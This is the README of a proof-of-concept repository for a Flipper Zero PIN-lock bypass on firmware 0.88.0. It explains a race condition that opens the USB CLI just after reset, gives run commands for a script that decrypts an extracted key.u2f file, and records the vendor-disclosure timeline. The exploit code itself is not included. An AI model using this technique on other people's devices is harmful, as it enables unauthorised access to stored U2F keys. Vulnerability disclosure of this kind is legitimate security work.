Proof-of-concept for Flipper Zero PIN bypass vulnerability. Tested on the latest 0.88.0 firmware.
- Node.js 18+
serialport
dependency. Install withnpm ci
oryarn
Makes Flipper vibrate.
# Execute and follow the instructions
./poc-vibro.mjs /dev/tty.usbmodemflip_1337
Decrypts key.u2f file from SD using Flipper's internal key.
# Assume that we've already extracted key.u2f from Flipper's SD card into /foo/key.u2f
# Execute and follow the instructions
./poc.mjs /dev/tty.usbmodemflip_1337 /foo/key.u2f
Firmware has a race condition in lock screen routine. For a few moments after reset, it's possible to establish a CLI connection over USB and send commands to the device.
PoC repeatedly tries to establish a connection. If succeed, it sends commands to Flipper's CLI.
Time window is small, but enough to perform cryptographic operations with CKS. Or, to simply make Flipper vibrate :)
-
On 2023-08-12 I've reached out to Flipper's support team by email asking for GitHub username of the security contact to privately share this repository to triage this vulnerability.
-
On 2023-08-16, Flipper's support team replied that this vulnerability should be disclosed using public GitHub issues.
-
On 2023-08-17 I've reached out to Flipper Development team in Telegram community asking for the security contact, but received "we don't consider this as a vulnerability" reply:
-
Initially, disclosure deadline was set to 2023-09-11. But, since Flipper's team doesn't consider this as a vulnerability, I'm publishing this right now.
- For the first, thanks to Flipper's team for the great device!
- Dmitry Nourell (@imcatwhocode) for a good catch on Flipper boot animations and PoC.
- Egor Koleda (@radioegor146) for initial PoC, and help with weird bugs.